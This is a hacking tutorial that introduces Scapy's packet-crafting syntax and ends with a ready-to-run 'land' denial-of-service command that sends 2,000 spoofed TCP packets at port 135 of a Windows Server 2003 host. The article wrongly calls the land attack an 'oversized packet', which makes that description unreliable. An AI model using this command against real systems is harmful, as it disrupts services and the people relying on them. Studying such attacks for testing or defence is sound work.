Hack Like a Pro: Using the Powerful & Versatile Scapy for Scanning & DoSing
Welcome back, my hacker apprentices!
We have explored a number of packet manipulation tools here on Null Byte that can be very effective for network scanning, such as Nmap and Hping. As you know, almost any packet crafting/manipulation tool can also be used for DoSing (denial-of-service attacks). Given the power of creating just about any type of packet with any characteristics, we can likely find one that will take down a host or network.
In this article, we will add a new tool called Scapy to your arsenal of scanning and DoSing weapons. Scapy is a packet manipulation tool similar to Nmap and Hping, but unlike those other tools, Scapy is almost infinitely customizable. This is not to say that Nmap and Hping are not customizable, but their ability to be customized is limited. They trade off ease of use for customization. Scapy, on the other hand, has almost no limits in your ability to customize it, but it does have a bit of a learning curve.
If you invest the time to understanding Scapy, you will be rewarded with a very powerful weapon.
When using a tool like Scapy, Nmap, Hping, and others, it is critical you understand the structure of both the IP header and the TCP header. Without that fundamental knowledge of these protocols, it is trying to fly an F-16 into a war zone without basic and fundamental flight training. It is a powerful weapon and you might unleash a bomb or two, but you are likely to crash and burn as well.
In addition, you should be familiar with the TCP header and packet as well.
The better you understand the structure of these headers and packets, the better hacker you will be. Otherwise, you will be limited to being a script kiddie with some powerful tools and no knowledge to use them effectively.
Scapy is also very versatile. It can be customized to do ARP spoofing, ARP cache poisoning, packet sniffing and analysis like Tcpdump and Wireshark, injecting 802.1 frames like Aireplay-ng, and decoding VoIP like Cain and Abel. It is written in Python by Philipe Biondi and is capable of crafting packets as well as decoding packets. Its syntax is a bit obscure, but its power makes it worth investing the time to learn.
In this article, I'll try to introduce you first to Scapy's syntax and then we will use it for a simple yet effective DoS attack.
Let's fire up Kali, open a terminal and type:
- kali > scapy
When we do so, we will greeted with screen that looks like that above. Notice the ">>>" prompt. This indicates that Scapy is in interactive mode. All commands after this will be Scapy commands and will be interpreted by the Scapy interpreter.
Now that we are in the Scapy interpreter, let's type:
- >>> conf
As you can see in the screenshot above, Scapy reveals its configuration file when we type "conf" in. In a later tutorial, we will work with this configuration file in Scapy, but for now, I just want you to know where it resides.
The beauty of Scapy is its ability to custom build any packet you can imagine. Generally, the TCP/IP stack of your OS will build a RFC-compliant packet whenever you want to communicate over the Internet. As a hacker, we often want to create a custom/unique packet that may not be RFC-compliant for the purposes of gathering information on our target (i.e., scanning) or possibly creating a DoS condition by creating a packet that causes the target system to crash (land attack, ping of death, fragroute, etc.).
So, let's start by creating a simple IP packet. In Scapy, you first declare a variable that represents your packet and then define the packet attributes one by one. So, here we define our packet as "x" and then give x multiple attributes. Let's begin by defining "x" as an IP packet with a TTL of 64.
- >>> x=IP(ttl=64)
- >>> x
Notice that after I have created the variable x and defined it as an IP packet with a time to live (TTL) of 64, I then retyped the variable x and it responded with the value of x. In this case, IP time to live = 64.
Now, let's add some additional attributes to this variable x, such as a source and destination IP address. The syntax is similar to Wireshark or Tcpdump. We represent the source IP attribute with x.src and the destination IP attribute with x.dst followed by the value in double quotation marks (").
- >>> x.src="192.168.1.101"
- >>> x.dst="192.168.1.122"
Notice that after setting each value, I checked the value by simply retyping the variable followed by the attribute.
Now we have created a packet with the following attributes:
- Source IP is 192.168.1.101
- Destination IP is 192.168.1.122
We can check these by now typing the variable name, x, and Scapy will return our variable with its our attributes.
Scapy has large number of built-in functions. We can list these functions by typing:
- >>> lsc()
Since the list is too long to display in one screen, I have displayed the first of these functions above and the last of these functions below. Note, some functions did not fit on either screen.
Note the command "send" on the first line of the second screenshot of the functions. This is what we use when we want to send a packet. Let's use it to send the packet we created above called "x" that has the attributes of TTL=64, source IP address of 192.168.1.101, and a destination iP address of 192.168.1.122. Of course, when we send this packet, it will go to the destination IP address and will have a limit of 64 hops (TTL=64).
- >>> send(x)
As you can see, our specially crafted packet x was sent to the destination IP address.
We can use Scapy to craft a packet with just about any value in any of the IP header or TCP header fields, such as window size, flags, fragmentation field, acknowledgement value, sequence number, etc.
I hope by now that you getting the idea that Scapy to be used to manipulate any of the fields in the TCP/IP packet. We will play with some of the other fields in a subsequent Scapy tutorial.
Now, let's use this capability to create a malicious packet and then send it to a target system. Windows Server 2003 (believe or not, there are still millions of 2003 servers out there; check Netcraft or use Xprobe2 to find the operating system) is vulnerable to the "land" attack. This is a DoS attack that sends an oversized packet to the target with the same source and destination IP address and the same source and destination port. It doesn't always crash the system, but will slow it down considerably. For web servers, slowing them down is effectively a DoS.
Let's create that land attack packet in Scapy. Scapy can take all of the attributes in a single command. So, let's create our "land" attack packet and send it 2,000 times. We can do this by typing:
- >>> send(IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
Let's break down that command.
- send is the command
- IP defines the protocol for IP addresses
- src="192.168.1.122" is the source IP address
- dst="192.168.1.122" is the destination IP address
- TCP defines the protocol for the ports
- sport=135 defines the source port
- dport=135 defines the destination port
- count=2000 defines the number of packets we want to send
If these packets are directed at a Windows Server 2003, it can crash the system or at least slow it down dramatically. When a web server is slowed, it effectively DoSes the website.
Scapy is yet another powerful scanning and DoSing tool in our arsenal of tools. Scapy is incredibly versatile enabling us to do multiple tasks with this single tool. It has almost an unlimited ability to create packets with any characteristics you can imagine and thereby create a unique scanning technique and DoS attacks.